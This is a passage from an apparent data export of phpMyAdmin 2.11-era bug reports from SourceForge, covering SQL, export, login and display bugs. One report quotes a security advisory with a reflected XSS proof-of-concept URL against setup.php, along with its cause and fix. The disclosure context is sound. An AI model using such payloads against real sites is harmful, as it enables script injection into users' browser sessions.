, `enq results answers`.`answer id`, `enq export information`.`advertiser id`, `enq client test`.`fill date`, IF `q9`.`answer id`= 50 , Koop , Huur ) AS `typewoning`, CASE `q3`.`answer id` WHEN 11 THEN 30000 WHEN 12 THEN 45000 WHEN 13 THEN 60000 WHEN 14 THEN 90000 WHEN 15 THEN 100000 WHEN 16 THEN 0 ELSE 15000 END AS `inkomen`, GROUP CONCAT `qa`.`answer` SEPARATOR , ) AS `overig` FROM `enq client` INNER JOIN `enq client test` ON `enq client`.`id` = `enq client test`.`client id` AND `enq client test`.`enquete id` = 2 AND `enq client test`.`distribution` = true AND `enq client test`.`fill date` gt; 0000 00 00 00 00 00 AND `enq client test`.`fill date` lt; CONCAT CURDATE ), 00 00 00 ) INNER JOIN `enq results answers` ON `enq client`.`id` = `enq results answers`.`client id` AND `enq results answers`.`question id` = 13 INNER JOIN `enq results answers` AS `q9` ON `q9`.`client id` = `enq client`.`id` AND `q9`.`question id` = 9 INNER JOIN `enq results answers` AS `q3` ON `q3`.`client id` = `enq client`.`id` AND `q3`.`question id` = 3 INNER JOIN `enq results answers` AS `qother` ON `qother`.`client id` = `enq client`.`id` AND `qother`.`answer id` IN 62 , 64 , 65 , 66 , 67 , 68 , 71 , 79 , 76 , 77 , 78 , 79 ) INNER JOIN `enq question answers` AS `qa` ON `qother`.`answer id` = `qa`.`id` LEFT JOIN `enq export information` ON `enq client`.`id` = `enq export information`.`client id` AND `enq export information`.`advertiser id` = 2 WHERE `enq results answers`.`answer id` lt; gt; 80 AND `enq results answers`.`answer id` lt; gt; 149 AND ISNULL `enq export information`.`advertiser id`) AND `enq client`.`day of birth` gt; DATE ADD CURDATE ) , INTERVAL 55 YEAR) AND `enq client`.`day of birth` lt; DATE ADD CURDATE ) , INTERVAL 18 YEAR) AND `enq client`.`zipcode` != 1314CH GROUP BY `enq client`.`id` ORDER BY `enq client test`.`fill date` ASC, `enq results answers`.`answer id` ASC =============================== QUERY 2 =============================== SELECT `enq client`.
, `enq results answers`.`answer id`, `enq export information`.`advertiser id`, `enq client test`.`fill date`, IF `q9`.`answer id`= 50 , Koop , Huur ) AS `typewoning`, CASE `q3`.`answer id` WHEN 11 THEN 30000 WHEN 12 THEN 45000 WHEN 13 THEN 60000 WHEN 14 THEN 90000 WHEN 15 THEN 100000 WHEN 16 THEN 0 ELSE 15000 END AS `inkomen`, GROUP CONCAT `qa`.`answer` SEPARATOR , ) AS `overig` FROM `enq client` INNER JOIN `enq client test` ON `enq client`.`id` = `enq client test`.`client id` AND `enq client test`.`enquete id` = 2 AND `enq client test`.`distribution` = true AND `enq client test`.`fill date` gt; 0000 00 00 00 00 00 AND `enq client test`.`fill date` lt; 2007 09 18 00 00 00 INNER JOIN `enq results answers` ON `enq client`.`id` = `enq results answers`.`client id` AND `enq results answers`.`question id` = 13 INNER JOIN `enq results answers` AS `q9` ON `q9`.`client id` = `enq client`.`id` AND `q9`.`question id` = 9 INNER JOIN `enq results answers` AS `q3` ON `q3`.`client id` = `enq client`.`id` AND `q3`.`question id` = 3 INNER JOIN `enq results answers` AS `qother` ON `qother`.`client id` = `enq client`.`id` AND `qother`.`answer id` IN 62 , 64 , 65 , 66 , 67 , 68 , 71 , 79 , 76 , 77 , 78 , 79 ) INNER JOIN `enq question answers` AS `qa` ON `qother`.`answer id` = `qa`.`id` LEFT JOIN `enq export information` ON `enq client`.`id` = `enq export information`.`client id` AND `enq export information`.`advertiser id` = 2 WHERE `enq results answers`.`answer id` lt; gt; 80 AND `enq results answers`.`answer id` lt; gt; 149 AND ISNULL `enq export information`.`advertiser id`) AND `enq client`.`day of birth` gt; 1952 09 18 AND `enq client`.`day of birth` lt; 1989 09 18 AND `enq client`.`zipcode` != 1314CH GROUP BY `enq client`.`id` ORDER BY `enq client test`.`fill date` ASC, `enq results answers`.`answer id` ASC Original URL https sourceforge.net p phpmyadmin bugs 2534 https sourceforge.net p phpmyadmin bugs 2534 Original author adrichemp","bug"
"24444","8899","table options > storage engine displayed wrong.
on a innodb table when you go to operations, in the table options fieldset the storage engine is displayed to be myisam but it is innodb this is annoying when you rename the table because it also changes you the storage engine pma 2.11.1 rc1 PHP 5.2.3 MySQL 5.0.41 Original URL https sourceforge.net p phpmyadmin bugs 2535 https sourceforge.net p phpmyadmin bugs 2535 Original author pbogd Found in version 2.11.0","bug"
"24444","8900","Character in query wrongly interpreted.
In v2.11.0 when the SQL SELECT query contains the plus ) character, after results are shown, if the [Show] button is used then the plus character is translated into a space like in URL encoding).
To test SELECT FROM my table WHERE my column LIKE Test the above on a table which can be like CREATE TABLE my table my column VARCHAR 32)); INSERT INTO my table my column) VALUES 1 ), 2 ), 3 ); Original URL https sourceforge.net p phpmyadmin bugs 2536 https sourceforge.net p phpmyadmin bugs 2536 Original author kemal djakman Found in version 2.11.0","bug"
"24444","8901","Wrong error when a string contains semicolon.
When entering SELECT FROM foo WHERE bar = ; or even SELECT ; in an SQL window, I get the following error message Error There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unclosed quote 30 STR SQL SELECT FROM foo WHERE bar = ; SQL query Documentation SELECT FROM foo WHERE bar = ; MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 Both statements are valid SQL and work without problems in the MySQL command line client.
Original URL https sourceforge.net p phpmyadmin bugs 2537 https sourceforge.net p phpmyadmin bugs 2537 Original author c960657","bug"
"24444","8902","Copying db does not copy internal relations.
When database is copied, database relations are copied as well.
These elations keep references to the old database name.
Only way to remove update these relations is to do it by editing relations table Original URL https sourceforge.net p phpmyadmin bugs 2538 https sourceforge.net p phpmyadmin bugs 2538 Original author ethx Found in version 2.11.0","bug"
"24444","8903","Propose table structure and Export.
How to produce 1\.
Open a table in Structure view.
2\.
Click Propose table structure 3\.
Click Export 4\.
Leave default settings Data has to be checked.)
5\.
Click Go Result The DumpData Query are erroneous; SELECT FROM `table name` PROCEDURE ANALYSE ) LIMIT 16 Errors LIMIT 16 are misplaced should not be in the Query).
Question on the side) Is not the idea to have the export after Propose table structure to be the CREATE TABLE proposed by PROCEDURE ANALYSE ) `?
Checked versions phpMyAdmin 2.11.1 phpMyAdmin 2.11.2 dev On Server version 5.0.18 PHP Version 5.1.2 and Server version 4.1.18 PHP Version 5.1.2 and Server version 5.0.45 PHP Version 5.2.4 1 Original URL https sourceforge.net p phpmyadmin bugs 2539 https sourceforge.net p phpmyadmin bugs 2539 Original author z0l0ft Found in version 2.11.1","bug"
"24444","8904","Do not use NaviDatabaseNameColor for fieldset.
I think the default color for NaviDatabaseNameColor isn t very good, because every fieldset title looks like a link!
same color) A better default value of e.g.
333, 555 or 000 would be really better.
Original URL https sourceforge.net p phpmyadmin bugs 2540 https sourceforge.net p phpmyadmin bugs 2540 Original author phpmyforum Found in version 2.11.1","bug"
"24444","8905","export on server and AllowAnyWhereRecoding.
with cfg[ AllowAnywhereRecoding ] = true; cfg[ SaveDir ] = some folder ; selecting, e.g., iso... for Character set of the file the dump is utf 8 coded.
export to local file works as intended though.
checked versions pma 2.9 ... 3.0 svn Original URL https sourceforge.net p phpmyadmin bugs 2541 https sourceforge.net p phpmyadmin bugs 2541 Original author windkiel Found in version 2.11.2","bug"
"24444","8906","TextareaAutoSelect issues.
1\.
When TextareaAutoSelect is false, the focus should also go to this textarea without need to click 2\.
Why don t we set the default value to false?
When a user wants to copy paste on a Linux desktop from a terminal to the textarea, a value of true blocks him to do so.
Original URL https sourceforge.net p phpmyadmin bugs 2542 https sourceforge.net p phpmyadmin bugs 2542 Original author lem9","bug"
"24444","8907","Browse Foreign Values Return Values Not Escaped.
When using the browse foreign values functionality of the application, incorrect return values are specified in the selection lists.
For instance, the value an Active Directory username) domain\bjones is returned as domainx08jones .
Return values are not escaped.
Original URL https sourceforge.net p phpmyadmin bugs 2543 https sourceforge.net p phpmyadmin bugs 2543 Original author arambau Found in version 2.11.1","bug"
"24444","8908","Make the world write check on config file optional.
Hi, I ve got a corporate server where an NTFS filesystem is mounted and where all of the apache stuff goes to.
There s also an instance of phpMyAdmin.
Now there s a check which determinates wether config.inc.php is world writable or not and if it is world writable, the system die s with the message Wrong permissions on configuration file, should not be world writable!
.
Due to the fact that the mounted volume is an NTFS filesystem, the check always results in that the config.inc.php file is world writable, thus rendering phpMyAdmin unusable.
I had to remove the check lines to make phpMyAdmin working.
Recommended solution Create an option that allows administrators to skip that test on Unix like systems where the file appears world writable.
I don t know what happens on systems where ACLs are used, but I guess it s similar there.
Regards, Timo Original URL https sourceforge.net p phpmyadmin bugs 2544 https sourceforge.net p phpmyadmin bugs 2544 Original author timo h Found in version 2.11.0","bug"
"24444","8909","regexp search doesn t work with backslashes.
It seems the search function with regular expressions doesn t return any results as soon as I have a backslash in the search query.
Something simple like \d Original URL https sourceforge.net p phpmyadmin bugs 2545 https sourceforge.net p phpmyadmin bugs 2545 Original author ctulhu Found in version 2.11.3","bug"
"24444","8910","Login with html entities in password fails.
When logging with passwords containing characters translated to html entities like amp;lt; after giving the less than character to the password filed of the login form) sends unconverted html entity directly to mysqli real connect, so the login fails.
Console logins to mysql with mysql binary client works fine with these passwords.
It seems, this problem was introduced in one of the latest PMA versions or has some dependance on the newest PHP 5.2.4).
Original URL https sourceforge.net p phpmyadmin bugs 2546 https sourceforge.net p phpmyadmin bugs 2546 Original author komanek Found in version 2.11.1","bug"
"24444","8911","XSS in setup.php.
exploit setup.php?
gt; gt; lt;script gt;alert xss ); lt; script gt; reason SERVER[ REQUEST URI ] is not escaped before printed out solution add htmlspecialchars ) original report Security team In the course of assessing one of our clients, I discovered a XSS flaw in the setup.php page of phpMyAdmin.
More information is provided in the advisory below.
Please confirm that you have received this.
The DigiTrust Group Advisory 071009a phpMyAdmin Product phpMyAdmin 2.11.1 Credits Omer Singer The DigiTrust Group http www.digitrustgroup.com October 9, 2007 Risk Level MEDIUM Vulnerability can be exploited to execute arbitrary HTML and script code in a user s browser session in context of an affected site.
Program Summary phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web.
http www.phpmyadmin.net Cross site Scripting Vulnerability http target domain.com phpMyAdmin 2.11.1 scripts setup.php?
gt; gt; lt;script gt;alert xss ); lt; script gt; Vendor Response In progress.
Vendor Solution n a.
Copyright c) 2007 The DigiTrust Group.
Permission is granted for the redistribution of this alert electronically.
It may not be edited in any way without the express written consent of The DigiTrust Group.
Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use on an AS IS condition.
There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Original URL https sourceforge.net p phpmyadmin bugs 2547 https sourceforge.net p phpmyadmin bugs 2547 Original author cybot tm Found in version 2.11.1","bug"
"24444","8912","Undefined index in Message.class.php.
when trying to connect using an unknown user Notice Undefined index in D \HTdocs\svn\PhpMyAdmin\libraries\Message.class.php on line 324 svn r10753, php 5.2.4, w2k) Original URL https sourceforge.net p phpmyadmin bugs 2548 https sourceforge.net p phpmyadmin bugs 2548 Original author windkiel Found in version Latest Git","bug"
"24444","8913","Error handler produces error.
Notice in .
libraries Error.class.php 337 Undefined variable function Backtrace .
libraries Error.class.php 306 PMA Error gt;displayArg string Europe Prague) .
libraries Error.class.php 367 PMA Error gt;displayBacktrace ) .
libraries Error Handler.class.php 281 PMA Error gt;display ) .
libraries footer.inc.php 63 PMA Error Handler gt;dispErrors ) .
main.php 333 require once .
libraries footer.inc.php) How to reproduce this?
Put some broken code eg.
putenv TZ , Europe Prague );) and load some page twice on first run error is normally displayed, on second run, there is this extra error.
Original URL https sourceforge.net p phpmyadmin bugs 2549 https sourceforge.net p phpmyadmin bugs 2549 Original author nijel Found in version Latest Git","bug"
"24444","8914","Can t delete user with a german umlaut.. Hallo, Main question I can create and edit a user with the name e.g.
Mxc3xbcller .
But I can t delete this user.
additional questions a) the prefered download is phpMyAdmin 2.11.1 UTF 8 .
But in config.default.php cfg[ DefaultLang ] is set to en iso 8859 1 and not en utf 8 ?
b) Maybe a good idea, to set cfg[ Lang ] in config.default.php also to en utf 8 ?
c) In config.default.php the cfg[ DefaultConnectionCollation ] is set to utf8 unicode ci .
But for UTF 8 it should be utf8 general ci ?
c) Maybe a good idea, to set cfg[ DefaultCharset ] in config.default.php also to utf 8 ?
Regards, Carsten Original URL https sourceforge.net p phpmyadmin bugs 2550 https sourceforge.net p phpmyadmin bugs 2550 Original author c wiedmann Found in version 2.11.1","bug"
"24444","8915","problem with links to the MySQL manual.
Hello, with the default settings cfg[ MySQLManualBase ] = http dev.mysql.com doc refman ; cfg[ MySQLManualType ] = viewable ; A manual link MySQL Documentation) inside the page Show MySQL runtime information don t work.
If I change cfg[ MySQLManualBase ] = http dev.mysql.com doc refman 5.0 en ; This link work.
But the manual link ?)
next to the link Show MySQL runtime information on the main page stop working.
Only with cfg[ MySQLManualBase ] = http dev.mysql.com doc refman 5.0 en ; cfg[ MySQLManualType ] = searchable ; Both links work.
Regards, Carsten Original URL https sourceforge.net p phpmyadmin bugs 2551 https sourceforge.net p phpmyadmin bugs 2551 Original author c wiedmann Found in version 2.11.1","bug"
"24444","8916","can t delete the last column from a table.
Hello, a) create this database | CREATE DATABASE `test` DEFAULT CHARACTER SET utf8 COLLATE utf8 general ci; | USE `test`; | CREATE TABLE `test` | `test` varchar 255) NOT NULL | ) ENGINE=MyISAM DEFAULT CHARSET=utf8; b) go to the database `test` c) go to the table `test` d) in Structure view, try to delete the column `test` == gt; you can t delete the last and only) column from a table.
if you have 2 columns, you can delete both) Regards, Carsten Original URL https sourceforge.net p phpmyadmin bugs 2552 https sourceforge.net p phpmyadmin bugs 2552 Original author c wiedmann Found in version 2.11.1","bug"
"24444","8917","Cannot copy table ANSI QUOTES).
When I try to copy a table to another database the scripts explodes with the following Notice Undefined offset 77 in phpMyAdmin 2.11.1\libraries\Table.class.php on line 602 Original URL https sourceforge.net p phpmyadmin bugs 2553 https sourceforge.net p phpmyadmin bugs 2553 Original author tonymarston Found in version 2.11.1","bug"
"24444","8918","tbl alter.php Missing parameter field.
System PMA 2.11.1 MySQL 5.0.18 PHP 5.1.2 XP SP2 FireFox Mozilla 5.0 Windows; U; Windows NT 5.1; en US; rv 1.8.1.7) Gecko 20070914 Firefox 2.0.0.7 Reproduce steps 1\.
Config cfg[ Servers ][ i][ auth type ] = cookie ; cfg[ LoginCookieValidity ] = 5; So one would not have to wait too long when testing... 2\.
Click a database 3\.
Click a table gt; Structure 4\.
Wait until you are sure timeout has entered and passed your timezone.
5\.
Click on Change icon in the table view 6\.
Re enter user name and password, Click Go.
7\.
Voila...
Reproduce debated In tbl structure.php; When clicking on the Action item Change and logg out occur as of timeout; the parameter field are missing on re entering hence producing the error message tbl alter.php Missing parameter field FAQ 2.8) line 1836 in common.lib.php Understand the other Action items can not be executed on login as they require the sql query parameter which could be misused, but the field parameter could be processed with additional; if !empty GLOBALS[ field ]))\{ echo lt;input type= hidden name= field value= .htmlspecialchars GLOBALS[ field ]).
gt; .
\n ; \} in cookie.auth.lib.php and field in allow list of common.inc.php.
OR Change target in login form to tbl structure.php if it is tbl alter.php Original URL https sourceforge.net p phpmyadmin bugs 2555 https sourceforge.net p phpmyadmin bugs 2555 Original author z0l0ft Found in version 2.11.1","bug"
"24444","8919","false error controluser as defined on refused login.
although I have cfg[ Servers ][ i][ controluser ]= ; i get Connection for controluser as defined in your configuration failed.
when I try and login with false credentials.
Original URL https sourceforge.net p phpmyadmin bugs 2554 https sourceforge.net p phpmyadmin bugs 2554 Original author windkiel Found in version Latest Git","bug"
"24444","8920","Wrong database Size.
This morning I checkout out the size of the database and noticed something strange about the size column.
76 table s) Sum 10,028,725 MyISAM latin1 swedish ci 0.0 k GiB 29.1 KiB Notice the Summary Size is 0.0 k GiB???
Original URL https sourceforge.net p phpmyadmin bugs 2556 https sourceforge.net p phpmyadmin bugs 2556 Original author warforge00 Found in version 2.11.1.1","bug"
"24444","8921","Db selection pagination when switching servers.
If I go to server 2, select page 2 of the databases, and then go back to server 1 which should only have one page, nothing is displayed.
The SESSION [ navi limit offset ] variable should probably be cleared when I change servers.
Original URL https sourceforge.net p phpmyadmin bugs 2557 https sourceforge.net p phpmyadmin bugs 2557 Original author joho68 Found in version 2.11.3","bug"
"24444","8922","win table list disappears mixed case db names).
introduced recently, reproducable only under win If I select an existing db Dummy 14 tables are shown in the navi frame.
When I browse any table the bd name in the navi frame is changed to lowercase and the table list disappears!
Works correct in pma 2.11.1.1 my.ini lower case table names=2 preserves mixed case db table names on win) Original URL https sourceforge.net p phpmyadmin bugs 2558 https sourceforge.net p phpmyadmin bugs 2558 Original author windkiel Found in version Latest Git","bug"
"24444","8923","win copy db to mixed name db fails.
w2k, mysql 5.0.45, my.ini lower case table names=1 win default) under db any) Operations Copy database to A1 mixed case, CREATE DATABASE before copying) pma just stops working with a white right frame, should throw a warning instead.
Works fine if my.ini lower case table names=2 Original URL https sourceforge.net p phpmyadmin bugs 2559 https sourceforge.net p phpmyadmin bugs 2559 Original author windkiel Found in version 2.11.1","bug"
"24444","8924","Authentication bug when running fastcgi php5 cgi).
Default debian installation debian testing) Apache Apache 2.2 2.2.6 1) libapache2 mod fcgid apache2 mpm worker PHP php5 fastcgi 5.2.3 1) phpMyAdmin 2.11.1deb1 default debian packaged install) Issue Prior to this, I ran libapache2 mod php5 and libapache2 mpm prefork) , and the above phpmyadmin , and everything worked fine.
Went to test out fastcgi , so, installed the above versions.
When attempting to login to phpmyadmin default debian install is cookie based auth) , and a PASSWORD was given with a character in it , it would not authenticate.
Verified password correct via mysql command line.
password with no in it, worked fine, didnt test any other special chars) Attempted to patch with a fix from SVN due to htmlentities being run on inputs) and this didnt fix the issue either.
also flagged magic quotes off, still no joy.
reverted back to mod php5 , and everything works again It appears that either fastcgi is doing something to the pma password input posted to index.php, or , phpmyadmin handles something differently when run under fastcgi.
To duplicate the issue debian server, with apache2.2, mpm worker, and mod fcgid, and phpmyadmin all debian packaged, default installs) on command line mysql gt; create table zz; mysql gt; grant all on zz.
to myzz localhost identified by my zz ; the above will connect on command line, but will NOT connect on phpmyadmin.
Did a var dump POST) at the very top of index.php , and the dump showed the unaltered password properly Because this does NOT happen under libapache2 mod php5 , but only under fastcgi php, I am submittign this bug , despite the fix in svn, which did not work when I applied it referring to bug ID 1807923, listed as fixed in SVN) Upshot is, I reverted my install back to mod php5 and removed fastcgi , and phpmyadmin works normally everything else worked great under fastcgi in the 2 days I tested it) However the bug still exists and can be duplicated as I described if you need further info, or need me to test something, feel free to leave a comment here, as I ll check back every few days.
Original URL https sourceforge.net p phpmyadmin bugs 2560 https sourceforge.net p phpmyadmin bugs 2560 Original author trukfixer Found in version 2.11.1","bug"
"24444","8925","Some warnings escaped too much.
Warning about missing pmadb is escaped too much and html is displayed intestead of interpreted by browser http pma.cihar.com trunk config nopmadb db operations.php?db=phpmyadmin Original URL https sourceforge.net p phpmyadmin bugs 2561 https sourceforge.net p phpmyadmin bugs 2561 Original author nijel Found in version Latest Git","bug"
"24444","8926","Db list s displaying bug when db name contain symbol.
I have 2 database with names pulsar video pulsar lib When i m looking to left side of phpMyAdmin page i m see db names list.
In this list i m looking next pulsar video xxx) lib xxx) But normally i can see pulsar video xxx) pulsar lib xxx) P.S Sorry for broken english Original URL https sourceforge.net p phpmyadmin bugs 2562 https sourceforge.net p phpmyadmin bugs 2562 Original author delikates Found in version 2.11.1.1","bug"
"24444","8927","Used language gets deleted from available languages.
I m using MySql server version 4.1.22 community nt and phpMyAdmin version 2.11.1.2 I got this errors message Notice Undefined index en iso 8859 1 in E \webroot\phpMyAdmin\index.php on line 95 Well, here is line 95 lang iso code = GLOBALS[ available languages ][ GLOBALS[ lang ]][2]; I tracked the source of the error to the file libraries database interface.lib.php, function PMA DBI postConnect ), lines 828 854 If lang is defined and we are on MySQL gt;= 4.1.x, we auto switch the lang to its UTF 8 version if it exists and user didn t force language) if !empty GLOBALS[ lang ]) substr GLOBALS[ lang ], 5) != utf 8 ) !isset GLOBALS[ cfg ][ Lang ])) \{ lang utf 8 version = substr GLOBALS[ lang ], 0, strpos GLOBALS[ lang ], )) .
utf 8 ; if !empty GLOBALS[ available languages ][ lang utf 8 version])) \{ GLOBALS[ lang ] = lang utf 8 version; GLOBALS[ charset ] = utf 8 ; define PMA LANG RELOAD , 1); \} \} and we remove the non UTF 8 choices to avoid confusion if !defined PMA REMOVED NON UTF 8 )) \{ foreach GLOBALS[ available languages ] as each lang = gt; dummy) \{ if substr each lang, 5) != utf 8 ) \{ unset GLOBALS[ available languages ][ each lang]); \} \} define PMA REMOVED NON UTF 8 , 1); \} Basically, the first part of the code kindly lets me keep my language of choice, since I have forced in in the config file.
But then, the evil second part of the code still removes my selected language from the array of available languages.
So effectively, phpMyAdmin won t let me use non UTF 8 languages.
Original URL https sourceforge.net p phpmyadmin bugs 2563 https sourceforge.net p phpmyadmin bugs 2563 Original author elhamil Found in version 2.11.1.2","bug"
"24444","8928","SELECT DISTINCT CAST AS CHAR truncates results.
Please, see also this MySQL bug report for some more details http bugs.mysql.com 31279 Description Assume you have a table with an integer column f.e.
table cds from cdcol sample database.
Executing the following statement truncates result to 3 chars SELECT DISTINCT CAST jahr as CHAR) FROM cds gt; replace jahr with year in english version This problem does not appear on unix based mysql database server.
It did not occur just 1 Month ago.
There might have been a windows update in the last 4 weeks that causes this problem.
The problem also does not occur when executing SELECT CAST jahr as CHAR) FROM cds or SELECT DISTINCT CAST jahr as CHAR 4)) FROM cds Furthermore, it does not occure if using the MySQL command line client.
The fact, that phpMyAdmin as well as self written .NET applications using MySQL Connector NET 5.1.2 are affected seems somehow strange.
Original URL https sourceforge.net p phpmyadmin bugs 2564 https sourceforge.net p phpmyadmin bugs 2564 Original author renemt Found in version 2.11.1.2","bug"
"24444","8929","IF NOT EXISTS not added on triggers.
Hi!
Using 2.11.1.2, the script generated in the export feature not have IF NOT EXISTS clause on TRIGGER sentence.
Original URL https sourceforge.net p phpmyadmin bugs 2565 https sourceforge.net p phpmyadmin bugs 2565 Original author idcarlos Found in version 2.11.1.2","bug"
"24444","8930","checkUpload function yields incorrect results.
Hey, I was attempting to use the upload file feature in importing data for a while, and I kept getting the error File uploads are not allowed on this server.
.
I couldn t understand why because file uploads are allowed based on my settings.
Anyway, I dove into the source code and found this function function checkUpload ) \{ this gt;set enable upload , true); if strtolower ini get file uploads )) == off || ini get file uploads ) == 0) \{ this gt;set enable upload , false); \} \} The problem lies in ini get file uploads ) == 0.
I first removed that condition and it worked fine, but then I realized why that was yielding incorrect results.
ini get returns a string, so that 0 seems to need to be treated as a string ini get file uploads ) == 0 and that seemed to do the trick!
I hope this helps.
Also, thanks so much for all of your amazing work.
I ve used phpmyadmin for years now and it truly is amazing.
Original URL https sourceforge.net p phpmyadmin bugs 2566 https sourceforge.net p phpmyadmin bugs 2566 Original author cooleo100d Found in version 2.11.1.2","bug"
"24444","8931","Configuration explanation for cfg[UploadDir] is wrong..
In the documentation online, Configuration chapter, is written cfg[UploadDir] string The name of the directory where SQL files have been uploaded by other means than phpMyAdmin for example, ftp).
Those files are available under a drop down box when you click the database name, then the SQL tab.
If you do this, you don t find anything in the SQL tab; you find the drop down in the Insert tab instead.
Please correct the documentation.
Original URL https sourceforge.net p phpmyadmin bugs 2567 https sourceforge.net p phpmyadmin bugs 2567 Original author realwahl Found in version 2.11.1.2","bug"
"24444","8932","Wrong cookie path on IIS with PHP CGI.
Hello, On IIS and PHP setup as CGI, the session) cookie path is set to instead to e.g.
phpmyadmin http localhost phpmyadmin index.php ) Above a patch which works for me.
Regards, Carsten Original URL https sourceforge.net p phpmyadmin bugs 2568 https sourceforge.net p phpmyadmin bugs 2568 Original author c wiedmann Found in version 2.11.1.2","bug"
"24444","8933","Favicon too large.
The favicon that comes with phpMyadmin is in fact 48x48px.
It is supposed to be 16x16px.
Original URL https sourceforge.net p phpmyadmin bugs 2569 https sourceforge.net p phpmyadmin bugs 2569 Original author espena Found in version 2.11.1","bug"
"24444","8934","unnecessary can t load mysql .. warning when mysqli chosen.
not really a bug but annoying when I deliberately choose cfg[ Servers ][ i][ extension ] = mysqli ; in all server sections) I don t need to be warned Cannot load mysql extension.
Original URL https sourceforge.net p phpmyadmin bugs 2570 https sourceforge.net p phpmyadmin bugs 2570 Original author windkiel Found in version 2.11.1.2","bug"
"24444","8935","Error message hides fields, when adding tables.
Hi, just found an anoying behaviour, when adding tables to databases with errors in their fields.
Reproducable try to add a table with one INT 9999999) to any db.
The error message hides the input fields, so you can t correct any values.
I think this is not a good user interface at this point.
wespe rpm q phpMyAdmin phpMyAdmin 2.11.0 2.1 wespe rpm q mysql mysql 5.0.26 14 firefox 2.0.0.8 openSuSE 10.3 Verified up to phpMyAdmin 2.11.1.2 Original URL https sourceforge.net p phpmyadmin bugs 2571 https sourceforge.net p phpmyadmin bugs 2571 Original author fertig Found in version 2.11.0","bug"
"24444","8936","cfg[ MaxTableList ] and INFORMATION SCHEMA.
Setting a value for cfg[ MaxTableList ] in config.php.inc doesn t seem to work properly.
Server is Linux with MySQl 4.1.22 php 4.4.7 phpMyAdmin 2.11.1 If a database has more tables than the MaxTableList value, a pagination menu is created, however it isn t functional.
All tables in the database are listed regardless of the MaxTableList value, and choosing another page from the pagination menu only refreshes the list and displays all tables in the DB regardless of page selected.
Note that the related cfg[ MaxDbList ] setting does work properly.
This issue occurs in both IE and FireFox.
Original URL https sourceforge.net p phpmyadmin bugs 2572 https sourceforge.net p phpmyadmin bugs 2572 Original author kadence0 Found in version 2.11.0","bug"
"24444","8937","LIMIT being ignored.
Not sure if its just me or i have not set the config up correctly but if I try the following simple SQL I always get the first 30 rows.
SELECT FROM `table` WHERE `uid` =387 ORDER BY `desc` ASC LIMIT 0 , 50 Original URL https sourceforge.net p phpmyadmin bugs 2573 https sourceforge.net p phpmyadmin bugs 2573 Original author r si Found in version 2.11.2","bug"
"24444","8938","Edit Delete) img links pointing to wrong row.
trying to edit or delete) where `id` = 3 via img link) results in editing deleting) the row where `id` = 1 instead in spite of a PI defined.
see http pma.cihar.com trunk config sql.php?db=test jwk table=jwk utf8 pma3.0.0) or http rabus.phpmyadmin.net demos trunk sql.php?db=test jwk table=jwk utf8 pma username=demo fontsize=82 pma2.10) CREATE DATABASE IF NOT EXISTS test jwk; use test jwk; DROP TABLE IF EXISTS `jwk utf8 bin`; CREATE TABLE `jwk utf8 bin` `id` mediumint 3) NOT NULL, `german2` varchar 99) character set latin1 collate latin1 german2 ci NOT NULL, `utf8 unicode ci` varchar 99) character set utf8 collate utf8 unicode ci NOT NULL, `utf8 bin` varchar 99) character set utf8 collate utf8 bin NOT NULL, PRIMARY KEY `utf8 bin`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; INSERT INTO `jwk utf8 bin` VALUES 1, jxc3xbcrgen , jxc3xbcrgen , jxc3xbcrgen ), 2, xc2xb5 , xc2xb5 , xc2xb5 ), 3, Jxc3xbcrgen , Jxc3xbcrgen , Jxc3xbcrgen ), 4, xe2x82xac , xe2x82xac , xe2x82xac ); import the attached utf8 encoded file to reproduce) Original URL https sourceforge.net p phpmyadmin bugs 2574 https sourceforge.net p phpmyadmin bugs 2574 Original author windkiel Found in version Latest Git","bug"
"24444","8939","Error importing file with lowercase delimiter .
Issue loading the following file into the SQL Query textarea.
http firestuff.org wordpress wp content uploads 2006 03 base64.sql Shouldn t the SQL Query textarea be able to execute this file as the delimiter within the text should override the delimiter within the input box.
Using command line, it imported the file instantly.
Original URL https sourceforge.net p phpmyadmin bugs 2575 https sourceforge.net p phpmyadmin bugs 2575 Original author warforge00 Found in version 2.11.2","bug"
"24444","8940","Field for changing database comment has no title.
See http pma.cihar.com trunk config db operations.php?db=test Original URL https sourceforge.net p phpmyadmin bugs 2576 https sourceforge.net p phpmyadmin bugs 2576 Original author nijel","bug"
"24444","8941","drop table doesn t update left side.
with version 2.11.1.2 after a table is dropped the left side with all table names of that schema) isn t updated to reflect this change Original URL https sourceforge.net p phpmyadmin bugs 2577 https sourceforge.net p phpmyadmin bugs 2577 Original author toralf foerster Found in version 2.11.2","bug"
"24444","8942","Profile command repeated on older mysql servers.
I ve multiple servers, some of them are mysql 5.0. , some of them are version 4.1. .
If I m at a 5.0 server, the profiling query option appears.
This works fine, but if you enable profiling queries and then navigate to a mysql lt; 5.0 server and execute a query phpMyAdmin still issues the SET PROFILING =1; command, which results in a 1193 Unknown system variable PROFILING error.
Since the profiling checkbox isn t shown, I can t disable this feature, so I have to navigate to a gt;= 5.0 server to disable it first.
Proposed fix Hiding the profiling checkbox on pre 5.0 servers is fine, but don t execute the SET PROFILING command either.
Tested with phpMyAdmin 2.11.1.2 Original URL https sourceforge.net p phpmyadmin bugs 2578 https sourceforge.net p phpmyadmin bugs 2578 Original author maarten123 Found in version 2.11.1.2","bug"
"24444","8943","Too long url.
I m not sure that is this right category for this but anyway My web server apache 2.2.6 on Linux Fedora Core 6 x86 64) is reporting sometimes about too long URL.
This seems to be BIG problem because usually ISP s will not modify their web servers for one application.
Long URL s are problem for some browsers too.
If I remember right, the standard is defining max URL length about 250 255 letters.
When there can be long server name www.myownwebserverinsomewhere.info) and phpmyadmin is in subdirectory http www.myownwebserverinsomewhere.info phpmyadmin) and then phpmyadmin is adding some own variables like long db name myowndatabase and some other variables like token=50a2cee4743209c258627aa80fd95880), problem will be on your screen.
So the final URL can be something like this http www.myownwebserverinsomewhere.info phpmyadmin index.php?db=myowndatabase token=50a2cee4743209c258627aa80fd95880 So please fix that kind of problems.
This bug has come to my screen from several places on different web servers.
When the url length is too long, servers are reporting this kind of problem.
